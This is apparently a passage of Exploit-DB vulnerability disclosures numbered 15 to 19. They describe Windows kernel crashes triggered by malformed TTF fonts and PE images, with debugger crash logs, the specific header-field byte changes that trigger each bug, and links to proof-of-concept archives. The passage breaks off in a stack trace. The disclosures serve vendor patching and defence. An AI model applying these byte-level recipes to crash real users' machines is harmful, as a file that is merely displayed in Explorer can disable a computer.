  15. We have encountered a Windows kernel crash in the win32k.sys driver while processing a corrupted TTF font file. An example crash log excerpt generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF900C1E1C003,0x0000000000000001,0xFFFFF9600006D2A8,0x0000000000000000) Driver at fault: *** win32k.sys - Address FFFFF9600006D2A8 base at FFFFF96000010000, DateStamp 5d0c4490 [...] 1: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff900c1e1c003, memory referenced. Arg2: 0000000000000001, value 0 = read operation, 1 = write operation. Arg3: fffff9600006d2a8, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: fffff880082791f0 -- (.trap 0xfffff880082791f0) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=0000000000000000 rbx=0000000000000000 rcx=fffff900c1e1bfb8 rdx=000000000000000a rsi=0000000000000000 rdi=0000000000000000 rip=fffff9600006d2a8 rsp=fffff88008279380 rbp=000000000000000c r8=fffff960002f5750 r9=0000000000000002 r10=fffff900c1e1bfe9 r11=fffff900c1e1bff3 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc win32k!ulClearTypeFilter+0x214: fffff960`0006d2a8 8807 mov byte ptr [rdi],al ds:00000000`00000000=?? 
Resetting default scope LAST_CONTROL_TRANSFER: from fffff80002b65a22 to fffff80002ab1520 STACK_TEXT: fffff880`08278928 fffff800`02b65a22 : fffff900`c1e1c003 fffffa80`310f1b50 00000000`00000065 fffff800`02a82658 : nt!RtlpBreakWithStatusInstruction fffff880`08278930 fffff800`02b66812 : fffff880`00000003 fffff880`082791f0 fffff800`02aba420 fffff880`08278f90 : nt!KiBugCheckDebugBreak+0x12 fffff880`08278990 fffff800`02aaada4 : 00000000`00000068 fffff880`08279450 00000000`00010000 00000000`00000000 : nt!KeBugCheck2+0x722 fffff880`08279060 fffff800`02b847b2 : 00000000`00000050 fffff900`c1e1c003 00000000`00000001 fffff880`082791f0 : nt!KeBugCheckEx+0x104 fffff880`082790a0 fffff800`02ab6ddc : 00000000`00000001 fffff900`c1e1c003 00000000`00000000 fffff900`c1e1bf94 : nt!MmAccessFault+0x2322 fffff880`082791f0 fffff960`0006d2a8 : 00000000`00000000 fffff800`00000001 fffff880`08279450 fffff900`c1e1bf94 : nt!KiPageFault+0x35c fffff880`08279380 fffff960`0007097a : fffff900`c1a40010 fffff900`c1a40010 fffff880`08279928 00000000`00000002 : win32k!ulClearTypeFilter+0x214 fffff880`08279400 fffff960`0006ce00 : fffff880`0827b67b fffff880`08279928 fffff900`c1b71010 fffff960`00000b70 : win32k!xInsertMetricsPlusRFONTOBJ+0x20e fffff880`082794d0 fffff960`0006caa0 : fffff880`08279a00 fffff880`08279928 00000000`00000000 00000000`0000000a : win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x1f0 fffff880`08279550 fffff960`0006c498 : 00000000`00000000 fffff880`082796f0 fffff900`c00cb010 00000000`00000008 : win32k!ESTROBJ::vCharPos_H3+0x168 fffff880`082795d0 fffff960`0006d955 : 00000000`41800000 00000000`00000000 00000000`00000007 fffff880`082796f0 : win32k!ESTROBJ::vInit+0x350 fffff880`08279660 fffff960`0006d5f7 : fffff880`08279b60 fffff900`c1a40010 fffffa80`00000020 00000000`ffffffff : win32k!GreGetTextExtentExW+0x275 fffff880`08279920 fffff800`02ab8d53 : 00000000`5a010611 fffff880`00000b40 00000000`00000040 00000000`00000000 : win32k!NtGdiGetTextExtentExW+0x237 fffff880`08279a70 00000000`74da204a : 
00000000`74d8c46f 00000000`00010000 00000000`74d8b947 00000000`002ff888 : nt!KiSystemServiceCopyEnd+0x13 00000000`001adca8 00000000`74d8c46f : 00000000`00010000 00000000`74d8b947 00000000`002ff888 00000000`75ad5600 : wow64win!NtGdiGetTextExtentExW+0xa 00000000`001adcb0 00000000`74dcd18f : 00000000`002ff88c 00000000`7efdb000 00000000`7efdb000 00000000`7efdd000 : wow64win!whNtGdiGetTextExtentExW+0x43 00000000`001add00 00000000`74d52776 : 00000000`779a01e4 00000000`74dc0023 00000000`00000246 00000000`002ffeec : wow64!Wow64SystemServiceEx+0xd7 00000000`001ae5c0 00000000`74dcd286 : 00000000`00000000 00000000`74d51920 00000000`777d3128 00000000`7780c4f1 : wow64cpu!ServiceNoTurbo+0x2d 00000000`001ae680 00000000`74dcc69e : 00000000`00000000 00000000`00000000 00000000`74dc4b10 00000000`7ffe0030 : wow64!RunCpuSimulation+0xa 00000000`001ae6d0 00000000`778043c3 : 00000000`004f2d50 00000000`00000000 00000000`77902e70 00000000`777d7550 : wow64!Wow64LdrpInitialize+0x42a 00000000`001aec20 00000000`77869780 : 00000000`00000000 00000000`77876c7d 00000000`001af1d0 00000000`00000000 : ntdll!LdrpInitializeProcess+0x17e3 00000000`001af110 00000000`7781371e : 00000000`001af1d0 00000000`00000000 00000000`7efdf000 00000000`00000000 : ntdll! ?? ::FNODOBFM::`string'+0x22790 00000000`001af180 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!LdrInitializeThunk+0xe --- cut --- The type of the bugcheck implies a pool-based buffer overflow, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf", "hmtx" and "prep" tables. The issue reproduces on Windows 7 and Windows Server 2008 R2 (64-bit), with and without Special Pools enabled for win32k.sys. 
Attached is an archive with the proof-of-concept mutated TTF file, the original font used to generate it and the source code of a simple harness program, which loads the given font and displays all of its glyphs at different point sizes on the screen. Running the harness against the provided font is required to trigger the crash, and it only occurs after a few seconds (while processing the 2nd LOGFONT). Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47484.zip
  16. We have encountered a Windows kernel crash in nt!MiOffsetToProtos while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x0000003b (0x00000000C0000005,0xFFFFF8006F0860C4,0xFFFFD20AD8E1E290,0x0000000000000000) Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. For analysis of this file, run !analyze -v nt!DbgBreakPointWithStatus: fffff800`6f1c46a0 cc int 3 1: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* SYSTEM_SERVICE_EXCEPTION (3b) An exception happened while executing a system service routine. Arguments: Arg1: 00000000c0000005, Exception code that caused the bugcheck Arg2: fffff8006f0860c4, Address of the instruction which caused the bugcheck Arg3: ffffd20ad8e1e290, Address of the context record for the exception that caused the bugcheck Arg4: 0000000000000000, zero. [...] CONTEXT: ffffd20ad8e1e290 -- (.cxr 0xffffd20ad8e1e290) rax=00000000000000a2 rbx=ffffab829154f420 rcx=0000000000000000 rdx=0000000000000002 rsi=0000000000000000 rdi=ffffab828fb6f690 rip=fffff8006f0860c4 rsp=ffffd20ad8e1ec80 rbp=000000000000000b r8=ffffd20ad8e1ed90 r9=ffffab828fb6f690 r10=ffffab828fb6f690 r11=ffffe601c2e7f7b0 r12=0000000001000000 r13=0000000000000002 r14=000000000000a008 r15=ffffd20ad8e1ed90 iopl=0 nv up ei pl zr na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00050246 nt!MiOffsetToProtos+0x324: fffff800`6f0860c4 8b562c mov edx,dword ptr [rsi+2Ch] ds:002b:00000000`0000002c=???????? Resetting default scope [...] 
STACK_TEXT: ffffd20a`d8e1ec80 fffff800`6f62a3f9 : ffffab82`8fb6f6d0 ffffab82`9154f420 00000000`00000048 ffffab82`8fb6f690 : nt!MiOffsetToProtos+0x324 ffffd20a`d8e1ed60 fffff800`6f6d6105 : ffffab82`9154f420 ffffd20a`d8e1efb0 ffffd20a`d8e1ef50 00000000`0000b000 : nt!MiLogRelocationRva+0x29 ffffd20a`d8e1edb0 fffff800`6f5fc56a : ffffd20a`d8e1f180 ffffd20a`d8e1f180 ffffd20a`d8e1efb0 ffffd20a`d8e1f180 : nt!MiParseComImage+0xd9 ffffd20a`d8e1eeb0 fffff800`6f5dca20 : ffffab82`9154f420 ffffd20a`d8e1f180 ffffd20a`d8e1f180 ffffab82`9154f3f0 : nt!MiCreateNewSection+0x2b6 ffffd20a`d8e1f010 fffff800`6f5dcd24 : ffffd20a`d8e1f040 ffffe601`c3b87f40 ffffab82`9154f420 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 ffffd20a`d8e1f100 fffff800`6f5dc37f : 00000000`11000000 ffffd20a`d8e1f4c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 ffffd20a`d8e1f280 fffff800`6f5dc110 : 00000005`e1478f48 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff ffffd20a`d8e1f360 fffff800`6f1ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 ffffd20a`d8e1f3d0 00007ffb`2815c9a4 : 00007ffb`25251ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25 00000005`e1478ed8 00007ffb`25251ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14 00000005`e1478ee0 00007ffb`25255640 : 0000019b`db947d00 00000024`00000000 00007ffb`26202770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 00000005`e1479110 00007ffb`2523c41d : 0000019b`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 00000005`e1479180 00007ffb`272503d1 : 0000019b`db9497c0 00000000`00000000 0000019b`db948c30 00007ffb`27266d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 00000005`e14791e0 00007ffb`2725035c : 00000000`00000000 00007ffb`257610ff 0000019b`db9497c0 00000005`e1479530 : 
shell32!_LoadVersionInfo+0x39 00000005`e1479250 00007ffb`257dc1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c [...] --- cut --- The direct cause of the crash is an attempt to read from a near-zero address. As the address does not seem to be controlled, and NULL page mappings are prohibited in modern systems (except for when NTVDM is enabled on 32-bit platforms), we classify it as a Denial of Service vulnerability. We have not determined the specific root cause of the issue, but we have found that it is related to the processing of .NET executables. We have minimized one of the crashing samples down to a 2-byte difference in relation to the original file: one which increases the value of the SizeOfImage field from 0xa000 to 0xa100, and one that changes the CLR Runtime Header data directory address from 0x2008 to 0xa008. The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. 
Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47485.zip
  17. We have encountered a Windows kernel crash in CI!CipFixImageType while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF8007B6E00AC,0x0000000000000000,0xFFFFF80079A7E5C1,0x0000000000000000) Driver at fault: *** CI.dll - Address FFFFF80079A7E5C1 base at FFFFF80079A30000, DateStamp 8581dc0d . Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. [...] ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff8007b6e00ac, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff80079a7e5c1, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: fffffa8375df1860 -- (.trap 0xfffffa8375df1860) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. 
rax=0000000000000000 rbx=0000000000000000 rcx=0000000000000000 rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000 rip=fffff80079a7e5c1 rsp=fffffa8375df19f0 rbp=fffffa8375df1b30 r8=00000000000000c0 r9=fffff8007b6d0080 r10=0000000000000004 r11=fffff8007b6e0070 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz ac po cy CI!CipFixImageType+0x9d: fffff800`79a7e5c1 418b44cb3c mov eax,dword ptr [r11+rcx*8+3Ch] ds:fffff800`7b6e00ac=???????? Resetting default scope LAST_CONTROL_TRANSFER: from fffff80077ea6642 to fffff80077dc46a0 STACK_TEXT: fffffa83`75df0e18 fffff800`77ea6642 : fffff800`7b6e00ac 00000000`00000003 fffffa83`75df0f80 fffff800`77d22be0 : nt!DbgBreakPointWithStatus fffffa83`75df0e20 fffff800`77ea5d32 : fffff800`00000003 fffffa83`75df0f80 fffff800`77dd0fb0 fffffa83`75df14c0 : nt!KiBugCheckDebugBreak+0x12 fffffa83`75df0e80 fffff800`77dbca07 : ffff8ac5`62b15f80 fffff800`77ed0110 00000000`00000000 fffff800`78063900 : nt!KeBugCheck2+0x952 fffffa83`75df1580 fffff800`77de0161 : 00000000`00000050 fffff800`7b6e00ac 00000000`00000000 fffffa83`75df1860 : nt!KeBugCheckEx+0x107 fffffa83`75df15c0 fffff800`77c7aaef : 00000000`00000000 00000000`00000000 00000000`00000000 fffff800`7b6e00ac : nt!MiSystemFault+0x1d3171 fffffa83`75df16c0 fffff800`77dca920 : fffff800`7b6d0000 00000000`00000000 ffffe687`5031c180 00000000`00000000 : nt!MmAccessFault+0x34f fffffa83`75df1860 fffff800`79a7e5c1 : ffffe687`4f6b1080 fffff800`7b6d0080 00000000`00000000 fffff800`79a67280 : nt!KiPageFault+0x360 fffffa83`75df19f0 fffff800`79a7c879 : fffffa83`75df1cd0 00000000`00000000 00000000`c00000bb 00000000`00000000 : CI!CipFixImageType+0x9d fffffa83`75df1a30 fffff800`78285766 : fffffa83`75df1c70 fffff800`7b6d0000 00000000`0000000e fffff800`7b6d0000 : CI!CiValidateImageHeader+0x279 fffffa83`75df1bb0 fffff800`7828528a : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00011000 : nt!SeValidateImageHeader+0xd6 fffffa83`75df1c60 
fffff800`7821e0da : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!MiValidateSectionCreate+0x436 fffffa83`75df1e50 fffff800`781fc861 : fffffa83`75df2180 fffffa83`75df1fb0 00000000`40000000 fffffa83`75df2180 : nt!MiValidateSectionSigningPolicy+0xa6 fffffa83`75df1eb0 fffff800`781dca20 : ffffe687`5031c180 fffffa83`75df2180 fffffa83`75df2180 ffffe687`5031c150 : nt!MiCreateNewSection+0x5ad fffffa83`75df2010 fffff800`781dcd24 : fffffa83`75df2040 ffffd483`86519790 ffffe687`5031c180 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 fffffa83`75df2100 fffff800`781dc37f : 00000000`11000000 fffffa83`75df24c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 fffffa83`75df2280 fffff800`781dc110 : 000000bc`f7c78928 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff fffffa83`75df2360 fffff800`77dce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 fffffa83`75df23d0 00007ffe`5771c9a4 : 00007ffe`54641ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25 000000bc`f7c788b8 00007ffe`54641ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14 000000bc`f7c788c0 00007ffe`54645640 : 00000203`34a8b3d0 00000007`00000000 00007ffe`56d32770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 000000bc`f7c78af0 00007ffe`5462c41d : 00000203`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 000000bc`f7c78b60 00007ffe`559f03d1 : 00000203`34a79130 00000000`00000000 00000203`34a96190 00007ffe`55a06d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 000000bc`f7c78bc0 00007ffe`559f035c : 00000000`00000000 00007ffe`549f10ff 00000203`34a79130 000000bc`f7c78f10 : shell32!_LoadVersionInfo+0x39 000000bc`f7c78c30 00007ffe`54a6c1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : 
shell32!CVersionPropertyStore::Initialize+0x2c [...] --- cut --- The direct cause of the crash is an attempt to read from an invalid out-of-bounds address relative to the kernel mapping of the parsed PE file. Specifically, we believe that it is caused by the lack of proper sanitization of the IMAGE_FILE_HEADER.SizeOfOptionalHeader field. We have minimized one of the crashing samples down to a 3-byte difference in relation to the original file: one which increases the value of the SizeOfOptionalHeader field from 0x00e0 to 0x66e0, one that decreases SizeOfImage from 0x8400 to 0x0e00, and one that changes DllCharacteristics from 0 to 0x89 (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | 9). The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could also potentially be exploited as a limited information disclosure primitive. Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. 
Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47486.zip
  18. We have encountered a Windows kernel crash in memcpy() called by nt!MiParseImageLoadConfig while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF805751F5000,0x0000000000000000,0xFFFFF805773CF6E5,0x0000000000000000) Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. [...] ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff805751f5000, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff805773cf6e5, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: ffff8380cd506820 -- (.trap 0xffff8380cd506820) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. 
rax=000000000000005c rbx=0000000000000000 rcx=ffff8380cd506c80 rdx=00007484a7cee364 rsi=0000000000000000 rdi=0000000000000000 rip=fffff805773cf6e5 rsp=ffff8380cd5069b8 rbp=ffff8380cd506fb0 r8=0000000000000008 r9=0000000000000003 r10=000000000000020b r11=ffff8380cd506be0 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc nt!memcpy+0xa5: fffff805`773cf6e5 f30f6f4c1110 movdqu xmm1,xmmword ptr [rcx+rdx+10h] ds:fffff805`751f4ff4=???????????????????????????????? Resetting default scope LAST_CONTROL_TRANSFER: from fffff805774a6642 to fffff805773c46a0 STACK_TEXT: ffff8380`cd505dd8 fffff805`774a6642 : fffff805`751f5000 00000000`00000003 ffff8380`cd505f40 fffff805`77322be0 : nt!DbgBreakPointWithStatus ffff8380`cd505de0 fffff805`774a5d32 : fffff805`00000003 ffff8380`cd505f40 fffff805`773d0f60 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12 ffff8380`cd505e40 fffff805`773bca07 : fffff078`3c1e0f80 fffff805`774d0110 00000000`00000000 fffff805`77663900 : nt!KeBugCheck2+0x952 ffff8380`cd506540 fffff805`773e0161 : 00000000`00000050 fffff805`751f5000 00000000`00000000 ffff8380`cd506820 : nt!KeBugCheckEx+0x107 ffff8380`cd506580 fffff805`7727aaef : fffff805`77663900 00000000`00000000 00000000`00000000 fffff805`751f5000 : nt!MiSystemFault+0x1d3171 ffff8380`cd506680 fffff805`773ca920 : ffff8380`cd5068b0 fffff805`773caa4e fffff805`75000000 fffff078`3c1f1000 : nt!MmAccessFault+0x34f ffff8380`cd506820 fffff805`773cf6e5 : fffff805`7788397d ffff8d03`15813460 fffff805`7723944d ffff8d03`15813080 : nt!KiPageFault+0x360 ffff8380`cd5069b8 fffff805`7788397d : ffff8d03`15813460 fffff805`7723944d ffff8d03`15813080 ffff8d03`15cab288 : nt!memcpy+0xa5 ffff8380`cd5069c0 fffff805`7788238e : fffff805`75000000 ffffaf0f`9d705048 00000000`00000000 00000000`001f5000 : nt!MiParseImageLoadConfig+0x171 ffff8380`cd506d40 fffff805`777fc8a3 : ffff8380`cd507180 ffff8380`cd507180 ffff8380`cd506fb0 ffff8380`cd507180 : nt!MiRelocateImage+0x2fe 
ffff8380`cd506eb0 fffff805`777dca20 : ffff8d03`1526e520 ffff8380`cd507180 ffff8380`cd507180 ffff8d03`1526e4f0 : nt!MiCreateNewSection+0x5ef ffff8380`cd507010 fffff805`777dcd24 : ffff8380`cd507040 ffffaf0f`9d530760 ffff8d03`1526e520 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 ffff8380`cd507100 fffff805`777dc37f : 00000000`11000000 ffff8380`cd5074c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 ffff8380`cd507280 fffff805`777dc110 : 000000c1`e89f8e28 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff ffff8380`cd507360 fffff805`773ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 ffff8380`cd5073d0 00007ff8`2fa5c9a4 : 00007ff8`2d7c1ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25 000000c1`e89f8db8 00007ff8`2d7c1ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14 000000c1`e89f8dc0 00007ff8`2d7c5640 : 000001d3`61bac500 0000002e`00000000 00007ff8`2f292770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 000000c1`e89f8ff0 00007ff8`2d7ac41d : 000001d3`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 000000c1`e89f9060 00007ff8`2dd503d1 : 000001d3`61bd1d10 00000000`00000000 000001d3`61bb94d0 00007ff8`2dd66d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 000000c1`e89f90c0 00007ff8`2dd5035c : 00000000`00000000 00007ff8`2ced10ff 000001d3`61bd1d10 000000c1`e89f9410 : shell32!_LoadVersionInfo+0x39 000000c1`e89f9130 00007ff8`2cf4c1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c 000000c1`e89f9160 00007ff8`2cee23d4 : 00000000`00000080 00000000`00000000 00000000`80004002 00000000`f20003f1 : windows_storage!InitializeFileHandlerWithFile+0xc9 [...] 
--- cut --- We have minimized one of the crashing samples down to a 2-byte difference in relation to the original file, which changes the Load Configuration Directory address from 0x1e4644 to 0x1f4f44. The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could also potentially be exploited as a limited information disclosure primitive. Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47487.zip
  19. We have encountered a Windows kernel crash in CI!HashKComputeFirstPageHash while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF80068F02000,0x0000000000000000,0xFFFFF80067291A2C,0x0000000000000000) Driver at fault: *** CI.dll - Address FFFFF80067291A2C base at FFFFF80067230000, DateStamp 8581dc0d . Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. [...] ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff80068f02000, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff80067291a2c, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: ffffe20f4b7d6400 -- (.trap 0xffffe20f4b7d6400) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. 
rax=00000000000000c8 rbx=0000000000000000 rcx=144670b8d60e0000 rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000 rip=fffff80067291a2c rsp=ffffe20f4b7d6590 rbp=ffffe20f4b7d6690 r8=00000000fffffe00 r9=fffff80068ef0000 r10=0000000000000002 r11=ffffe20f4b7d6760 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na pe nc CI!HashKComputeFirstPageHash+0x1f4: fffff800`67291a2c 418b5dd4 mov ebx,dword ptr [r13-2Ch] ds:ffffffff`ffffffd4=???????? Resetting default scope LAST_CONTROL_TRANSFER: from fffff80065aa6642 to fffff800659c46a0 STACK_TEXT: ffffe20f`4b7d59b8 fffff800`65aa6642 : fffff800`68f02000 00000000`00000003 ffffe20f`4b7d5b20 fffff800`65922be0 : nt!DbgBreakPointWithStatus ffffe20f`4b7d59c0 fffff800`65aa5d32 : fffff800`00000003 ffffe20f`4b7d5b20 fffff800`659d0fb0 ffffe20f`4b7d6060 : nt!KiBugCheckDebugBreak+0x12 ffffe20f`4b7d5a20 fffff800`659bca07 : ffff8bc5`e2f17f80 fffff800`65ad0110 00000000`00000000 fffff800`65c63900 : nt!KeBugCheck2+0x952 ffffe20f`4b7d6120 fffff800`659e0161 : 00000000`00000050 fffff800`68f02000 00000000`00000000 ffffe20f`4b7d6400 : nt!KeBugCheckEx+0x107 ffffe20f`4b7d6160 fffff800`6587aaef : fffffb00`023b21b0 00000000`00000000 00000000`00000000 fffff800`68f02000 : nt!MiSystemFault+0x1d3171 ffffe20f`4b7d6260 fffff800`659ca920 : ffffe20f`4b7d6860 00000000`00000000 00000000`00000200 fffff800`65c651c0 : nt!MmAccessFault+0x34f ffffe20f`4b7d6400 fffff800`67291a2c : 00000000`00000000 ffffe20f`4b7d6690 00000000`00000000 00000000`00001000 : nt!KiPageFault+0x360 ffffe20f`4b7d6590 fffff800`67280829 : 00000000`00000000 ffffce0d`8ae71003 ffffac8f`23a2a9e8 00000000`00000000 : CI!HashKComputeFirstPageHash+0x1f4 ffffe20f`4b7d67c0 